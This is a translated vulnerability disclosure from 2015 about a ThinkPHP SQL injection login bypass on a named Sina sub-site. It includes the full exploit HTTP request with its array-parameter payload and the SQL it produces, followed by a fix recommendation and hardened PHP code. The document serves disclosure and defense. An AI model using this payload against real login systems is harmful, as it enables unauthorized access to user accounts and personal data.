2015-04-22: Details reported to the vendor, awaiting vendor response
2015-04-22: Vendor confirmed; details disclosed to the vendor only
2015-05-02: Details disclosed to core white hats and domain experts
2015-05-12: Details disclosed to regular white hats
2015-05-22: Details disclosed to intern white hats
2015-06-06: Details disclosed to the public
SQL injection in the ThinkPHP framework on a Sina sub-site
http://www.wooyun.org/bugs/wooyun-2014-086742
ThinkPHP debug mode is enabled on the site, so every executed SQL statement is visible in the response. Testing http://oa.gd.sina.com.cn/login/check_login shows that a "universal password" (login bypass) can be constructed, because the request parameter is passed as an array and ThinkPHP interprets it as an operator expression. See the related report WooYun: ThinkPHP架构设计不合理极易导致SQL注入 (ThinkPHP's architecture makes SQL injection easy).
POST /login/check_login HTTP/1.1
Host: oa.gd.sina.com.cn
Proxy-Connection: keep-alive
Content-Length: 40
Pragma: no-cache
Cache-Control: no-cache
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://oa.gd.sina.com.cn
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://oa.gd.sina.com.cn/login/index
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4

emp_no[0]=neq&emp_no[1]=admin&password=1
This causes the following SQL to be executed (note the WHERE clause: `emp_no[0]=neq&emp_no[1]=admin` has become `<> 'admin'`, which matches almost every user):
SELECT User.emp_name AS name,User.id AS id,User.emp_no AS emp_no,User.emp_name AS emp_name,User.letter AS letter,User.password AS password,User.dept_id AS dept_id,User.position_id AS position_id,User.rank_id AS rank_id,User.sex AS sex,User.birthday AS birthday,User.last_login_ip AS last_login_ip,User.login_count AS login_count,User.pic AS pic,User.email AS email,User.duty AS duty,User.office_tel AS office_tel,User.mobile_tel AS mobile_tel,User.create_time AS create_time,User.update_time AS update_time,User.is_del AS is_del,User.openid AS openid,User.westatus AS westatus,User.rank_gwzn AS rank_gwzn,User.rank_name AS rank_name,User.leader AS leader,User.marriage AS marriage,User.native_place AS native_place,User.id_number AS id_number,User.nation AS nation,User.education AS education,User.graduate_school AS graduate_school,User.blood AS blood,User.constellation AS constellation,User.qq AS qq,User.weixin AS weixin,User.weibo AS weibo,User.domicile AS domicile,User.set_order AS set_order,User.is_admin AS is_admin,User.is_city AS is_city,User.grade_id AS grade_id,Dept.name AS dept_name FROM oa_user User JOIN oa_dept Dept ON Dept.id=User.dept_id WHERE ( User.emp_name <> 'admin' ) OR ( User.emp_no <> 'admin' ) LIMIT 1
Fix recommendation: update ThinkPHP, and never pass raw request values (which may be arrays) directly into where() conditions.
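The following is an added illustration of the defensive fix, not code from the report or from Sina. It assumes ThinkPHP 3.x conventions (I() for request input, M() for a model, where()->find()) and a password stored as a password_hash() value; the column and function names are hypothetical.

```php
<?php
// Vulnerable pattern, as described in the report above: the request value goes
// straight into where(). PHP decodes emp_no[0]=neq&emp_no[1]=admin into an
// array, and ThinkPHP treats array('neq', 'admin') as an operator expression,
// so the condition becomes "emp_no <> 'admin'" and matches almost any row.
function checkLoginVulnerable() {
    return M('User')
        ->where(array('emp_no' => I('post.emp_no')))
        ->find();
}

// Hardened pattern: refuse anything that is not a plain, bounded string before
// it reaches the query builder, then verify the password against the stored hash.
function checkLoginHardened() {
    $empNo = I('post.emp_no');
    // An array here means the caller is trying to smuggle an operator; reject it
    // outright instead of casting (casting an array to string yields "Array").
    if (!is_string($empNo) || $empNo === '' || strlen($empNo) > 32) {
        return false;
    }
    // Scalar string value: ThinkPHP now emits emp_no = 'value' with a bound literal.
    $user = M('User')->where(array('emp_no' => $empNo))->find();
    if (!$user) {
        return false;
    }
    $password = I('post.password');
    // Assumes the password column holds a password_hash() result (hypothetical).
    if (!is_string($password) || !password_verify($password, $user['password'])) {
        return false;
    }
    return $user;
}
```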
Severity: Medium
Vulnerability Rank: 5
Confirmed: 2015-04-22 15:01
Vendor reply: Thank you for your attention to Sina security; the vulnerability is being fixed.
Latest status: none